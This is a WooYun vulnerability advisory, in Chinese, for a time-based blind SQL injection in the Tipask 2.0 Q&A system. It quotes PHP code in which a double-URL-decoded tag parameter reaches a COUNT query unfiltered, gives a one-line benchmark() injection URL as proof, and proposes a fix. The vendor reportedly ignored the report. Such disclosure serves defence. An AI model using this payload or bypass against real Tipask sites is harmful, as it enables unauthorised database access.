当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037201

漏洞标题:tipask问答系统2.0SQL时间盲注漏洞

相关厂商:tipask

漏洞作者: Kavia

提交时间:2013-09-15 12:35

修复时间:2013-10-30 12:35

公开时间:2013-10-30 12:35

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

其实我是来膜拜猪头子的

详细说明:

关于对get/post检测的部分,主要就是看猪头子大牛的:
WooYun: tipask问答系统2.0 ajaxsearch二次编码注入漏洞
/model/question.php

function ontag() {
$tag = urldecode($this->get['2']); //二次编码绕过
//echo $tag;
$encodeword = urlencode($tag);
$navtitle = $tag . '-标签搜索';
$qstatus = $status = intval($this->get[3]);
(!$status) && ($qstatus = "1,2,6");
$startindex = ($page - 1) * $pagesize;
$rownum = $this->db->fetch_total("question_tag", " tname='$tag' "); //带入查询


/lib/db.class.php
function fetch_total($table,$where='1') {
return $this->result_first("SELECT COUNT(*) num FROM ".DB_TABLEPRE."$table WHERE $where"); //带入查询
}

漏洞证明:

exp:http://host/tipask/?question/tag/+urlencode("' and (select if(1=1,benchmark(500000,sha(1)),0))>0#");

修复方案:

function ontag() {
$tag = $this->get['2'];

版权声明:转载请注明来源 Kavia@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝